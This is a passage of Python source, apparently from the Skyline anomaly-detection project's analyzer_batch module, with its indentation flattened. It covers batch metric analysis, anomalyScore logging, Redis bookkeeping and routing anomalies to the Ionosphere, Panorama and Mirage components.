# Add the timestamp to a Redis key called
# analyzer_batch.test.<metric_name>
# Start the metric sending data again (re-enable in vista)
# vista/flux will fill the missing data, when analyzer pushes
# the metric to analyzer_batch to process, if analyzer_batch
# is set to test_anomaly True and finds the key, if the
# timestamp matches the timestamp in the key, analyzer_batch
# will multiply the timestamp data point by 15, this should
# trigger an anomaly. Ensure you use a metric which will
# trigger, a load related metric is usually adequate.
# test_anomaly = False
test_anomaly_at = None
test_anomaly_batch_timeseries = []
if test_anomaly:
test_anomaly_at = None
test_anomaly_key = 'analyzer_batch.test.%s' % base_name
try:
test_anomaly_at = self.redis_conn.get(test_anomaly_key)
except:
test_anomaly_at = None
if test_anomaly_at:
if int(test_anomaly_at) == int(batch_timeseries[-1][0]):
for timestamp, value in batch_timeseries:
if int(timestamp) == int(test_anomaly_at):
anomaly_value = value * 100
logger.info('test_anomaly - replacing value %s with anomaly_value of %s at %s in %s timeseries' % (
str(value), str(anomaly_value),
str(test_anomaly_at), metric_name))
value = anomaly_value
test_anomaly_batch_timeseries.append([timestamp, value])
if test_anomaly_batch_timeseries:
batch_timeseries = test_anomaly_batch_timeseries
logger.info('test_anomaly - replaced %s timeseries with anomaly value in it' % (
metric_name))
try:
self.redis_conn.delete(test_anomaly_key)
logger.info('test_anomaly - deleted test_anomaly Redis key - %s' % str(test_anomaly_key))
except:
logger.error(traceback.format_exc())
logger.error('error :: failed to delete test_anomaly Redis key - %s' % str(test_anomaly_key))
# @modified 20200423 - Feature #3504: Handle airgaps in batch metrics
# Feature #3480: batch_processing
# Feature #3486: analyzer_batch
# Changed to algoritms_batch so there is no pollution and
# analyzer and analyzer_batch are totally independent
# metric_airgaps = []
# anomalous, ensemble, datapoint = run_selected_algorithm(batch_timeseries, metric_name, metric_airgaps)
# @modified 20200425 - Feature #3508: ionosphere.untrainable_metrics
# Added run_negatives_present and added negatives_found
# anomalous, ensemble, datapoint = run_selected_batch_algorithm(batch_timeseries, metric_name)
# @modified 20200607 - Feature #3566: custom_algorithms
# Added algorithms_run
# @modified 20200815 - Feature #3678: SNAB - anomalyScore
# Added the number_of_algorithms to calculate anomalyScore from
anomalous, ensemble, datapoint, negatives_found, algorithms_run, number_of_algorithms = run_selected_batch_algorithm(batch_timeseries, metric_name, run_negatives_present)
if test_anomaly_batch_timeseries:
logger.info('test_anomaly - analyzed %s data with anomaly value in it and anomalous = %s' % (
metric_name, str(anomalous)))
# @added 20200815 - Feature #3678: SNAB - anomalyScore
if record_anomalyScore:
anomalyScore_file = '%s/%s/%s/skyline.SNAB.%s.anomalyScore.csv' % (
SNAB_DATA_DIR, skyline_app, base_name, base_name)
# Get the anomaly breakdown - who returned True?
triggered_algorithms = []
run_debug = False
if ensemble.count(True) and algorithms_run:
run_debug = True
if (int(batch_timestamp) % 20000) == 0:
run_debug = True
if run_debug:
logger.debug('debug :: ensemble to calculate anomalyScore - %s' % str(ensemble))
logger.debug('debug :: algorithms_run to calculate anomalyScore - %s' % str(algorithms_run))
for index, value in enumerate(ensemble):
if value:
algorithm = algorithms_run[index]
triggered_algorithms.append(algorithm)
if run_debug:
logger.debug('debug :: triggered_algorithms to calculate anomalyScore - %s' % str(triggered_algorithms))
anomalyScore = 0.0
try:
if len(triggered_algorithms) > 0 and number_of_algorithms > 0:
if len(triggered_algorithms) > settings.CONSENSUS:
anomalyScore = 1.0
else:
anomalyScore = len(triggered_algorithms) / settings.CONSENSUS
except:
logger.error(traceback.format_exc())
logger.error('error :: failed to calculate anomalyScore')
if not os.path.isfile(anomalyScore_file):
data = 'timestamp,value,anomalyScore,triggered_algorithms\n'
write_data_to_file(skyline_app, anomalyScore_file, 'w', data)
data = '%s,%s,%s,%s\n' % (str(int(batch_timestamp)), str(datapoint), str(anomalyScore), str(triggered_algorithms))
write_data_to_file(skyline_app, anomalyScore_file, 'a', data)
if run_debug:
logger.debug('%s,%s,%s,%s' % (str(int(batch_timestamp)), str(datapoint), str(anomalyScore), str(triggered_algorithms)))
# Update the last_timestamp metric Redis key
last_metric_timestamp_key = 'last_timestamp.%s' % base_name
redis_key_set = None
try:
int_metric_timestamp = int(batch_timestamp)
# @modified 20200503 - Feature #3504: Handle airgaps in batch metrics
# Feature #3480: batch_processing
# Feature #3486: analyzer_batch
# Set the last_timestamp expiry time to 1 month rather than
# settings.FULL_DURATION
self.redis_conn.setex(
last_metric_timestamp_key, 2592000, int_metric_timestamp)
redis_key_set = True
except:
logger.error('error :: failed to set Redis key %s' % last_metric_timestamp_key)
if anomalous:
if redis_key_set:
logger.info('anomalous :: anomaly detected on %s at %s with %s, set Redis key %s to %s' % (
base_name, str(int_metric_timestamp), str(datapoint),
last_metric_timestamp_key, str(int_metric_timestamp)))
else:
logger.info('anomalous :: anomaly detected on %s at %s with %s' % (
base_name, str(int_metric_timestamp),
str(datapoint)))
# @added 20200425 - Feature #3508: ionosphere.untrainable_metrics
# Determine if any metrcs have negatives values some they can be
# added to the ionosphere.untrainable_metrics Redis set
if run_negatives_present and negatives_found:
redis_set = 'ionosphere.untrainable_metrics'
try:
last_negative_timestamp = int(negatives_found[-1][0])
last_negative_value = negatives_found[-1][1]
remove_after_timestamp = int(last_negative_timestamp + settings.FULL_DURATION)
data = str([metric_name, batch_timestamp, datapoint, last_negative_timestamp, last_negative_value, settings.FULL_DURATION, remove_after_timestamp])
self.redis_conn.sadd(redis_set, data)
except:
logger.error(traceback.format_exc())
logger.error('error :: failed to add data to Redis set %s' % (
str(redis_set)))
# Added a Redis key for Mirage, Panorama and Ionosphere to
# query to identify if an anomaly has been added by
# analyzer_batch and set a longish TTL as if multiple
# anomalies for multiple metrics in a batch are sent to
# Ionosphere it could take Ionosphere a while to analyze
# them all. This key circumvents the requirement of each
# app to determine if a metric is a batch metric, as this
# is only created for batch metric anomalies.
analyzer_batch_metric_anomaly_key = '%s.anomaly.%s.%s' % (
skyline_app, str(int_metric_timestamp), base_name)
try:
int_metric_timestamp = int(batch_timestamp)
self.redis_conn.setex(
analyzer_batch_metric_anomaly_key,
3600, int_metric_timestamp)
logger.info('set Redis key %s with %s for other apps to identify this as an analyzer_batch anomaly' % (
analyzer_batch_metric_anomaly_key,
str(int_metric_timestamp)))
except:
logger.error('error :: failed to set Redis key %s' % analyzer_batch_metric_anomaly_key)
else:
if redis_key_set:
not_anomalous_count += 1
# @modified 20200728 - Feature #3480: batch_processing
# Feature #3486: analyzer_batch
# Only log on the last data point, not on all
if int_metric_timestamp == int(last_redis_data_timestamp):
logger.info('not anomalous :: %s at %s with %s (along with %s other not anomalous data points), set Redis key %s to %s' % (
base_name, str(int_metric_timestamp), str(datapoint),
str(not_anomalous_count),
last_metric_timestamp_key, str(int_metric_timestamp)))
else:
logger.info('not anomalous :: %s at %s with %s' % (
base_name, str(int_metric_timestamp),
str(datapoint)))
# @added 20190408 - Feature #2882: Mirage - periodic_check
# Add for Mirage periodic - is really anomalous add to
# real_anomalous_metrics and if in mirage_periodic_check_metric_list
# add as anomalous
if anomalous:
metric_timestamp = batch_timeseries[-1][0]
metric = [datapoint, base_name, metric_timestamp]
# Get the anomaly breakdown - who returned True?
triggered_algorithms = []
for index, value in enumerate(ensemble):
if value:
# @modified 20200607 - Feature #3566: custom_algorithms
# algorithm = settings.ALGORITHMS[index]
algorithm = algorithms_run[index]
anomaly_breakdown[algorithm] += 1
triggered_algorithms.append(algorithm)
# @added 20170206 - Bug #1904: Handle non filesystem friendly metric names in check files
sane_metricname = filesafe_metricname(str(base_name))
# If Panorama is enabled determine details
determine_anomaly_details = False
if settings.PANORAMA_ENABLED:
determine_anomaly_details = True
# If Ionosphere is enabled determine details
try:
ionosphere_enabled = settings.IONOSPHERE_ENABLED
if settings.IONOSPHERE_ENABLED:
determine_anomaly_details = True
except:
ionosphere_enabled = False
if determine_anomaly_details:
metric_timestamp = str(int(batch_timeseries[-1][0]))
from_timestamp = str(int(batch_timeseries[1][0]))
timeseries_dir = base_name.replace('.', '/')
send_back_to_analyzer = None
# @added 20161119 - Branch #922: ionosphere
# Task #1718: review.tsfresh
# Set defaults which can be used later to determine how
# Analyzer should handle/route anomalies
analyzer_metric = True
mirage_metric = False
ionosphere_metric = False
send_to_ionosphere = False
if metric_name in ionosphere_unique_metrics:
ionosphere_metric = True
send_to_ionosphere = True
if metric_name in mirage_unique_metrics:
analyzer_metric = False
ionosphere_metric = False
mirage_metric = True
send_to_ionosphere = False
# @added 20170108 - Feature #1830: Ionosphere alerts
# Only send smtp_alerter_metrics to Ionosphere
smtp_alert_enabled_metric = True
if base_name in non_smtp_alerter_metrics:
smtp_alert_enabled_metric = False
if ionosphere_enabled:
if analyzer_metric:
# We do not want send all anomalous metrics to
# Ionosphere if they are not being alerted on as
# they will be pointless they will have no alert if
# it is within the EXPIRATION_TIME and there will be
# no reference graphs from an alert for the user to
# action.
cache_key = 'last_alert.smtp.%s' % (base_name)
last_alert = False
try:
last_alert = self.redis_conn.get(cache_key)
except Exception as e:
logger.error('error :: could not query Redis for cache_key: %s' % e)
if not last_alert:
send_to_ionosphere = True
else:
send_to_ionosphere = False
if ionosphere_metric:
logger.info('not sending to Ionosphere - alert key exists - %s' % (base_name))
else:
if mirage_metric:
logger.info('not sending to Ionosphere - Mirage metric - %s' % (base_name))
send_to_ionosphere = False
# analyzer_batch sends Analyzer and Mirage
# metrics back to analyzer
send_back_to_analyzer = True
# @added 20170306 - Feature #1960: ionosphere_layers
# Ionosphere layers require the timeseries at
# FULL_DURATION so if this is a Mirage and
# Ionosphere metric, Analyzer needs to provide
# the timeseries file for later (within 60
# seconds) analysis, however we want the data
# that triggered the anomaly, as before this was
# only created by Mirage if an alert was
# triggered, but Ionosphere layers now require
# this file before an alert is triggered
timeseries_dir = base_name.replace('.', '/')
training_dir = '%s/%s/%s' % (
settings.IONOSPHERE_DATA_FOLDER, str(metric_timestamp),
str(timeseries_dir))
if not os.path.exists(training_dir):
mkdir_p(training_dir)
full_duration_in_hours = int(settings.FULL_DURATION) / 3600
ionosphere_json_file = '%s/%s.mirage.redis.%sh.json' % (
training_dir, base_name,
str(int(full_duration_in_hours)))
if not os.path.isfile(ionosphere_json_file):
timeseries_json = str(batch_timeseries).replace('[', '(').replace(']', ')')
try:
write_data_to_file(skyline_app, ionosphere_json_file, 'w', timeseries_json)
logger.info('%s added Ionosphere Mirage %sh Redis data timeseries json file :: %s' % (
skyline_app, str(int(full_duration_in_hours)), ionosphere_json_file))
except:
logger.error(traceback.format_exc())
logger.error('error :: failed to add %s Ionosphere Mirage Redis data timeseries json file - %s' % (skyline_app, ionosphere_json_file))
# @modified 20170108 - Feature #1830: Ionosphere alerts
# Only send smtp_alerter_metrics to Ionosphere
# if send_to_ionosphere:
if send_to_ionosphere and smtp_alert_enabled_metric:
if metric_name in ionosphere_unique_metrics:
logger.info('sending an ionosphere metric to Ionosphere - %s' % (base_name))
else:
logger.info('sending an analyzer metric to Ionosphere for training - %s' % (base_name))
try:
# @modified 20161228 Feature #1828: ionosphere - mirage Redis data features
# Added full_duration
# @modified 20170127 - Feature #1886: Ionosphere learn - child like parent with evolutionary maturity
# Added ionosphere_parent_id, always zero from Analyzer and Mirage
ionosphere_parent_id = 0
send_anomalous_metric_to(
skyline_app, 'ionosphere', timeseries_dir,
metric_timestamp, base_name, str(datapoint),
from_timestamp, triggered_algorithms,
batch_timeseries, str(settings.FULL_DURATION),
str(ionosphere_parent_id))
# @modified 20190522 - Task #3034: Reduce multiprocessing Manager list usage
# Moved to Redis key block below
# self.sent_to_ionosphere.append(base_name)
except:
logger.error(traceback.format_exc())
logger.error('error :: failed to send_anomalous_metric_to to ionosphere')
# @added 20190522 - Task #3034: Reduce multiprocessing Manager list usage
redis_set = 'analyzer.batch.sent_to_ionosphere'
data = str(base_name)
try:
self.redis_conn.sadd(redis_set, data)
except:
logger.error(traceback.format_exc())
logger.error('error :: failed to add %s to Redis set %s' % (
str(data), str(redis_set)))
# @added 20170403 - Feature #1994: Ionosphere training_dir keys
# Feature #2000: Ionosphere - validated
# Feature #1996: Ionosphere - matches page
# The addition of this key data could be done in
# skyline_function.py, however that would introduce
# Redis requirements in the send_anomalous_metric_to
# function, which is not desirable I think. So this is
# a non-KISS pattern that is replicated in mirage.py as
# well.
# Each training_dir and data set is now Redis keyed to increase efficiency
# in terms of disk I/O for ionosphere.py and making keyed data
# available for each training_dir data set so that transient matched data
# can be surfaced for the webapp along with directory paths, etc
ionosphere_training_data_key = 'ionosphere.training_data.%s.%s' % (str(metric_timestamp), base_name)
ionosphere_training_data_key_data = [
['metric_timestamp', int(metric_timestamp)],
['base_name', str(base_name)],
['timeseries_dir', str(timeseries_dir)],
['added_by', str(skyline_app)]
]
try:
self.redis_conn.setex(
ionosphere_training_data_key,
settings.IONOSPHERE_KEEP_TRAINING_TIMESERIES_FOR,
# @modified 20190413 - Task #2824: Test redis-py upgrade
# Task #2926: Update dependencies
# redis-py 3.x only accepts user data as bytes, strings or
# numbers (ints, longs and floats). All 2.X users should
# make sure that the keys and values they pass into redis-py
# are either bytes, strings or numbers. Use str
str(ionosphere_training_data_key_data))
except:
logger.error(traceback.format_exc())
logger.error('error :: failed to set Redis key %s' % ionosphere_training_data_key)
try:
del ionosphere_training_data_key_data
except:
pass
if ionosphere_metric:
analyzer_metric = False
# Only send Analyzer metrics
if analyzer_metric and settings.PANORAMA_ENABLED:
if not os.path.exists(settings.PANORAMA_CHECK_PATH):
mkdir_p(settings.PANORAMA_CHECK_PATH)
# Note:
# The values are enclosed is single quoted intentionally
# as the imp.load_source used results in a shift in the
# decimal position when double quoted, e.g.
# value = "5622.0" gets imported as
# 2016-03-02 12:53:26 :: 28569 :: metric variable - value - 562.2
# single quoting results in the desired,
# 2016-03-02 13:16:17 :: 1515 :: metric variable - value - 5622.0
added_at = str(int(time()))
source = 'graphite'
panorama_anomaly_data = 'metric = \'%s\'\n' \
'value = \'%s\'\n' \
'from_timestamp = \'%s\'\n' \
'metric_timestamp = \'%s\'\n' \
'algorithms = %s\n' \
'triggered_algorithms = %s\n' \
'app = \'%s\'\n' \
'source = \'%s\'\n' \
'added_by = \'%s\'\n' \
'added_at = \'%s\'\n' \
% (base_name, str(datapoint), from_timestamp,
# @modified 20200603 - Feature #3566: custom_algorithms
# metric_timestamp, str(settings.ALGORITHMS),
metric_timestamp, str(algorithms_run),
triggered_algorithms, skyline_app, source,
this_host, added_at)
# Create an anomaly file with details about the anomaly
panorama_anomaly_file = '%s/%s.%s.txt' % (
settings.PANORAMA_CHECK_PATH, added_at,
sane_metricname)
try:
write_data_to_file(
skyline_app, panorama_anomaly_file, 'w',
panorama_anomaly_data)
logger.info('added panorama anomaly file :: %s' % (panorama_anomaly_file))
# @modified 20190522 - Task #3034: Reduce multiprocessing Manager list usage
# Moved to Redis set block below
# self.sent_to_panorama.append(base_name)
except:
logger.error(traceback.format_exc())
logger.error('error :: failed to add panorama anomaly file :: %s' % (panorama_anomaly_file))
try:
del panorama_anomaly_data
except:
pass
redis_set = 'analyzer_batch.sent_to_panorama'
data = str(base_name)
try:
self.redis_conn.sadd(redis_set, data)
except:
logger.error(traceback.format_exc())
logger.error('error :: failed to add %s to Redis set %s' % (
str(data), str(redis_set)))
else:
# @modified 20160207 - Branch #922: Ionosphere
# Handle if all other apps are not enabled
other_app = 'none'
if mirage_metric:
other_app = 'Mirage'
if ionosphere_metric:
other_app = 'Ionosphere'
logger.info('not adding panorama anomaly file for %s - %s' % (other_app, metric))
# Send back to Analyzer to alert
if analyzer_metric:
send_back_to_analyzer = True
if send_back_to_analyzer:
cache_key = '%s.alert.%s.%s' % (skyline_app, metric_timestamp, base_name)
# @modified 20201008 - Feature #3772: Add the anomaly_id to the http_alerter json
# Branch #3068: SNAB
# Added algorithms_run
cache_key_value = [float(datapoint), base_name, int(metric_timestamp), triggered_algorithms, algorithms_run]
try:
self.redis_conn.setex(
cache_key, 300,
str(cache_key_value))
logger.info(
'add Redis alert key - %s - %s' %
(cache_key, str(cache_key_value)))
except:
logger.error(traceback.format_exc())
logger.error(
'error :: failed to add Redis key - %s - [%s, \'%s\', %s, %s, %s, %s]' %
(cache_key, str(datapoint), base_name,
str(int(metric_timestamp)),
str(triggered_algorithms),
str(algorithms_run)))
# It could have been deleted by the Roomba
except TypeError:
# @added 20200430 - Feature #3480: batch_processing
# Added logging here as the DeletedByRoomba exception is
# generally not related to that but related to some other fail
# in the processing of the run algorithms phase
logger.error(traceback.format_exc())
logger.error('error :: added as DeletedByRoomba but possibly not see traceback above')
exceptions['DeletedByRoomba'] += 1
# @added 20200423 - Feature #3504: Handle airgaps in batch metrics
# Feature #3480: batch_processing
# Feature #3486: analyzer_batch
# Handle analyzer_batch work being added over and over every
# minute by also updating the last_timestamp key if stale,
# boring, etc
last_metric_timestamp_key = 'last_timestamp.%s' % base_name
try:
int_metric_timestamp = int(time())
self.redis_conn.setex(
last_metric_timestamp_key, 2592000, int_metric_timestamp)
logger.info('set Redis key %s to %s, even though it has been deleted by Roomba' % (
last_metric_timestamp_key, str(int_metric_timestamp)))
except:
logger.error('error :: failed to set Redis key %s, even though it is has been deleted by Roomba' % last_metric_timestamp_key)
except TooShort:
exceptions['TooShort'] += 1
# @added 20200423 - Feature #3504: Handle airgaps in batch metrics
# Feature #3480: batch_processing
# Feature #3486: analyzer_batch
last_metric_timestamp_key = 'last_timestamp.%s' % base_name
try:
int_metric_timestamp = int(batch_timeseries[-1][0])
self.redis_conn.setex(
last_metric_timestamp_key, 2592000,
int_metric_timestamp)
# @modified 20200728 - Feature #3480: batch_processing
# Feature #3486: analyzer_batch
# Only log on the last data point, not on all
if int_metric_timestamp == int(last_redis_data_timestamp):
logger.info('set Redis key %s to %s, even though it is too short' % (
last_metric_timestamp_key, str(int_metric_timestamp)))
except:
logger.error('error :: failed to set Redis key %s, even though it is too short' % last_metric_timestamp_key)
except Stale:
exceptions['Stale'] += 1
# @added 20200423 - Feature #3504: Handle airgaps in batch metrics
# Feature #3480: batch_processing
# Feature #3486: analyzer_batch
last_metric_timestamp_key = 'last_timestamp.%s' % base_name
try:
int_metric_timestamp = int(batch_timeseries[-1][0])
self.redis_conn.setex(
last_metric_timestamp_key, 2592000,
int_metric_timestamp)
# @modified 20200728 - Feature #3480: batch_processing
# Feature #3486: analyzer_batch
# Only log on the last data point, not on all
if int_metric_timestamp == int(last_redis_data_timestamp):
logger.info('set Redis key %s to %s, even though it is stale' % (
last_metric_timestamp_key, str(int_metric_timestamp)))
except:
logger.error('error :: failed to set Redis key %s, even though it is stale' % last_metric_timestamp_key)
except Boring:
exceptions['Boring'] += 1
# @added 20200423 - Feature #3504: Handle airgaps in batch metrics
# Feature #3480: batch_processing
# Feature #3486: analyzer_batch
last_metric_timestamp_key = 'last_timestamp.%s' % base_name
try:
int_metric_timestamp = int(batch_timeseries[-1][0])
self.redis_conn.setex(
last_metric_timestamp_key, 2592000,
int_metric_timestamp)
# @modified 20200728 - Feature #3480: batch_processing
# Feature #3486: analyzer_batch
# Only log on the last data point, not on all
if int_metric_timestamp == int(last_redis_data_timestamp):
logger.info('set Redis key %s to %s, even though it is boring' % (
last_metric_timestamp_key, str(int_metric_timestamp)))
except:
logger.error('error :: failed to set Redis key %s, even though it is boring' % last_metric_timestamp_key)
except:
logger.error(traceback.format_exc())
logger.error('error - Other error reported')
exceptions['Other'] += 1
# @added 20200423 - Feature #3504: Handle airgaps in batch metrics
# Feature #3480: batch_processing
# Feature #3486: analyzer_batch
last_metric_timestamp_key = 'last_timestamp.%s' % base_name
try:
int_metric_timestamp = int(time())
self.redis_conn.setex(
last_metric_timestamp_key, 2592000,
int_metric_timestamp)
logger.error('error :: set Redis key %s to %s, even though it an other error has been thrown' % (
last_metric_timestamp_key, str(int_metric_timestamp)))
except:
logger.error('error :: failed to set Redis key %s, when other exception was thrown' % last_metric_timestamp_key)
# Remove for work list
redis_set = 'analyzer.batch'
data = [metric_name, int(last_analyzed_timestamp)]
try:
self.redis_conn.srem(redis_set, str(data))
logger.info('analyzer_batch :: removed batch metric item - %s - from Redis set - %s' % (str(data), redis_set))
except:
logger.error(traceback.format_exc())
logger.error('error :: analyzer_batch :: failed to remove batch metric item - %s - from Redis set - %s' % (str(data), redis_set))
try:
del timeseries
except:
pass
try:
del timestamps_to_analyse
except:
pass
try:
del batch_timeseries
except:
pass
if not batch_mode:
try:
del mirage_unique_metrics
except:
pass
try:
del ionosphere_unique_metrics
except:
pass
try:
del derivative_metrics
except:
pass
try:
del non_derivative_metrics
except:
pass
try:
del non_derivative_monotonic_metrics
except:
pass
try:
del non_smtp_alerter_metrics
except:
pass
# Add values to the queue so the parent process can collate
for key, value in anomaly_breakdown.items():
self.batch_anomaly_breakdown_q.put((key, value))
for key, value in exceptions.items():
self.batch_exceptions_q.put((key, value))
spin_end = time() - spin_start
logger.info('spin_batch_process took %.2f seconds' % spin_end)
return
def run(self):
"""
- Called when the process intializes.
- Determine if Redis is up and discover the number of `unique metrics`.
- Divide the `unique_metrics` between the number of `ANALYZER_PROCESSES`
and assign each process a set of metrics to analyse for anomalies.
- Wait for the processes to finish.
- Determine whether if any anomalous metrics require:
- Alerting on (and set `EXPIRATION_TIME` key in Redis for alert).
- Feed to another module e.g. mirage.
- Alert to syslog.
- Populate the webapp json with the anomalous_metrics details.
- Log the details about the run to the skyline analyzer log.
- Send skyline.analyzer metrics to `GRAPHITE_HOST`
"""
# Log management to prevent overwriting
# Allow the bin/<skyline_app>.d to manage the log
if os.path.isfile(skyline_app_logwait):
try:
os.remove(skyline_app_logwait)
except OSError:
logger.error('error - failed to remove %s, continuing' % skyline_app_logwait)
pass
now = time()
log_wait_for = now + 5
while now < log_wait_for:
if os.path.isfile(skyline_app_loglock):
sleep(.1)
now = time()
else:
now = log_wait_for + 1
logger.info('starting %s run' % skyline_app)
if os.path.isfile(skyline_app_loglock):
logger.error('error - bin/%s.d log management seems to have failed, continuing' % skyline_app)
try:
os.remove(skyline_app_loglock)
logger.info('log lock file removed')
except OSError:
logger.error('error - failed to remove %s, continuing' % skyline_app_loglock)
pass
else:
logger.info('bin/%s.d log management done' % skyline_app)
# @added 20190417 - Feature #2950: Report defaulted settings to log
# Added all the globally declared settings to enable reporting in the
# log the state of each setting.
try:
SERVER_METRIC_PATH = '.%s' % settings.SERVER_METRICS_NAME
if SERVER_METRIC_PATH == '.':
SERVER_METRIC_PATH = ''
logger.info('SERVER_METRIC_PATH is set from settings.py to %s' % str(SERVER_METRIC_PATH))
except:
SERVER_METRIC_PATH = ''
logger.info('warning :: SERVER_METRIC_PATH is not declared in settings.py, defaults to \'\'')
logger.info('skyline_app_graphite_namespace is set to %s' % str(skyline_app_graphite_namespace))
try:
ANALYZER_ENABLED = settings.ANALYZER_ENABLED
logger.info('ANALYZER_ENABLED is set to %s' % str(ANALYZER_ENABLED))
except:
ANALYZER_ENABLED = True
logger.info('warning :: ANALYZER_ENABLED is not declared in settings.py, defaults to True')
if not os.path.exists(settings.SKYLINE_TMP_DIR):
# @modified 20160803 - Adding additional exception handling to Analyzer
try:
mkdir_p(settings.SKYLINE_TMP_DIR)
except:
logger.error(traceback.format_exc())
logger.error('error :: failed to create %s' % settings.SKYLINE_TMP_DIR)
while 1:
now = time()
# Make sure Redis is up
try:
self.redis_conn.ping()
except:
logger.error(traceback.format_exc())
logger.error('error :: Analyzer cannot connect to redis at socket path %s' % settings.REDIS_SOCKET_PATH)
sleep(10)
try:
self.redis_conn = get_redis_conn(skyline_app)
except:
logger.error(traceback.format_exc())
# logger.error('error :: Analyzer cannot connect to redis at socket path %s' % settings.REDIS_SOCKET_PATH)
logger.error('error :: Analyzer cannot connect to get_redis_conn')
continue
try:
self.redis_conn_decoded.ping()
except:
logger.error(traceback.format_exc())
logger.error('error :: Analyzer batch cannot connect to redis at socket path %s' % settings.REDIS_SOCKET_PATH)
sleep(10)
try:
self.redis_conn_decoded = get_redis_conn_decoded(skyline_app)
except:
logger.error(traceback.format_exc())
# logger.error('error :: Analyzer cannot connect to redis at socket path %s' % settings.REDIS_SOCKET_PATH)
logger.error('error :: Analyzer batch cannot connect to get_redis_conn')
continue
"""
Determine if any metric has been added to process
"""
while True:
# Report app up
try:
self.redis_conn.setex(skyline_app, 120, int(now))
except:
logger.error(traceback.format_exc())
logger.error('error :: Analyzer batch could not update the Redis %s key' % skyline_app)
# Discover metrics to analyze
analyzer_batch_work = None
redis_set = 'analyzer.batch'
try:
analyzer_batch_work = self.redis_conn_decoded.smembers(redis_set)
except Exception as e:
logger.error('error :: could not query Redis for set %s - %s' % (redis_set, e))
if analyzer_batch_work:
analyzer_batch_work_queue_items = len(analyzer_batch_work)
if analyzer_batch_work_queue_items > 0:
logger.info('there are %s metrics to process in the %s Redis set' % (
str(analyzer_batch_work_queue_items), redis_set))
break
else:
logger.info('there are no batch metrics to process')
sleep(1)
metric_name = None
last_analyzed_timestamp = None
for index, analyzer_batch in enumerate(analyzer_batch_work):
try:
batch_processing_metric = literal_eval(analyzer_batch)
metric_name = str(batch_processing_metric[0])
last_analyzed_timestamp = int(batch_processing_metric[1])
break
except:
logger.error(traceback.format_exc())
logger.error('error :: could not determine details from analyzer_batch entry')
metric_name = None
last_analyzed_timestamp = None
batch_processing_metric = None
sleep(1)
# @added 20200728 - Feature #3480: batch_processing
# Feature #3486: analyzer_batch
# If multiple work items exist sort them by oldest timestamp and
# process the item with the oldest timestamp first
if analyzer_batch_work:
unsorted_analyzer_batch_work = []
for index, analyzer_batch in enumerate(analyzer_batch_work):
try:
batch_processing_metric = literal_eval(analyzer_batch)
metric_name = str(batch_processing_metric[0])
last_analyzed_timestamp = int(batch_processing_metric[1])
unsorted_analyzer_batch_work.append([metric_name, last_analyzed_timestamp])
except:
logger.error(traceback.format_exc())
logger.error('error :: could not determine details from analyzer_batch entry')
sorted_analyzer_batch_work = sorted(unsorted_analyzer_batch_work, key=lambda x: x[1])
logger.info('there are %s work items in the sorted_analyzer_batch_work list' % (str(len(sorted_analyzer_batch_work))))
# @added 20201017 - Feature #3818: ANALYZER_BATCH_PROCESSING_OVERFLOW_ENABLED
# Remove multiple entries for metrics and only add the latest
# timestamp item per metric
original_work_queue_length = len(sorted_analyzer_batch_work)
metrics = list(set([item[0] for item in sorted_analyzer_batch_work]))
logger.info('there are %s unique metrics with work items in the sorted_analyzer_batch_work list' % (str(len(metrics))))
if len(metrics) < original_work_queue_length:
new_analyzer_batch_work = []
for metric in metrics:
work_timestamps = []
for item in sorted_analyzer_batch_work:
if item[0] == metric:
timestamp = item[1]
work_timestamps.append(timestamp)
new_analyzer_batch_work.append([metric, timestamp])
if len(work_timestamps) > 1:
last_work_timestamp = work_timestamps[-1]
for work_timestamp in work_timestamps:
if work_timestamp != last_work_timestamp:
# Remove from work list
redis_set = 'analyzer.batch'
data = [metric, int(work_timestamp)]
try:
self.redis_conn.srem('analyzer.batch', str(data))
logger.info('analyzer_batch :: newer work exists, removed older work item - %s - from Redis set - %s' % (str(data), redis_set))
except:
logger.error(traceback.format_exc())
logger.error('error :: analyzer_batch :: failed to remove older work item - %s - from Redis set - %s' % (str(data), redis_set))
sorted_analyzer_batch_work = sorted(new_analyzer_batch_work, key=lambda x: x[1])
new_work_queue_length = len(sorted_analyzer_batch_work)
if original_work_queue_length != new_work_queue_length:
pruned_item_count = original_work_queue_length - new_work_queue_length
logger.info('the analyzer.batch Redis set was pruned of %s older items which have newer work items' % str(pruned_item_count))
metric_name = str(sorted_analyzer_batch_work[0][0])
last_analyzed_timestamp = int(sorted_analyzer_batch_work[0][1])
batch_processing_metric = [metric_name, last_analyzed_timestamp]
if not metric_name:
break
# @added 20200904 - Feature #3486: analyzer_batch
# Feature #3480: batch_processing
# Task #3730: Validate Mirage running multiple processes
# Remove any existing algorithm.error and timing files from any
# previous runs
pattern = '%s.*.algorithm.error' % skyline_app
try:
for f in os.listdir(settings.SKYLINE_TMP_DIR):
if re.search(pattern, f):
try:
os.remove(os.path.join(settings.SKYLINE_TMP_DIR, f))
logger.info('cleaning up old error file - %s' % (str(f)))
except OSError:
pass
except:
logger.error('error :: failed to cleanup algorithm.error files')
logger.info(traceback.format_exc())
pattern = '%s.*.algorithm.timings' % skyline_app
try:
for f in os.listdir(settings.SKYLINE_TMP_DIR):
if re.search(pattern, f):
try:
os.remove(os.path.join(settings.SKYLINE_TMP_DIR, f))
logger.info('cleaning up old timings file - %s' % (str(f)))
except OSError:
pass
except:
logger.error('error :: failed to cleanup algorithm.timing files')
logger.info(traceback.format_exc())
logger.info('processing - %s' % str(batch_processing_metric))
# Spawn processes
batch_pids = []
spawned_batch_pids = []
batch_pid_count = 0
run_timestamp = now
for i in range(1, 2):
if BATCH_MODE:
batch_p = Process(target=self.spin_batch_process, args=(i, run_timestamp, 'batch_mode', 0, sorted_analyzer_batch_work[0:300]))
else:
batch_p = Process(target=self.spin_batch_process, args=(i, run_timestamp, metric_name, last_analyzed_timestamp))
batch_pids.append(batch_p)
batch_pid_count += 1
logger.info('starting 1 of %s spin_batch_process' % (str(batch_pid_count)))
batch_p.start()
spawned_batch_pids.append(batch_p.pid)
# Send wait signal to zombie processes
# for p in pids:
# p.join()
# Self monitor processes and terminate if any spin_batch_process
# that has run for longer than 300 seconds
p_starts = time()
while time() - p_starts <= 300:
if any(p.is_alive() for p in batch_pids):
# Just to avoid hogging the CPU
sleep(.1)
else:
# All the processes are done, break now.
time_to_run = time() - p_starts
logger.info('1 spin_batch_process completed in %.2f seconds' % (time_to_run))
break
else:
# We only enter this if we didn't 'break' above.
logger.info('timed out, killing all spin_batch_process processes')
for p in batch_pids:
p.terminate()
# p.join()
for p in batch_pids:
if p.is_alive():
logger.info('stopping spin_process - %s' % (str(p.is_alive())))
p.join()
# Grab data from the queue and populate dictionaries
exceptions = dict()
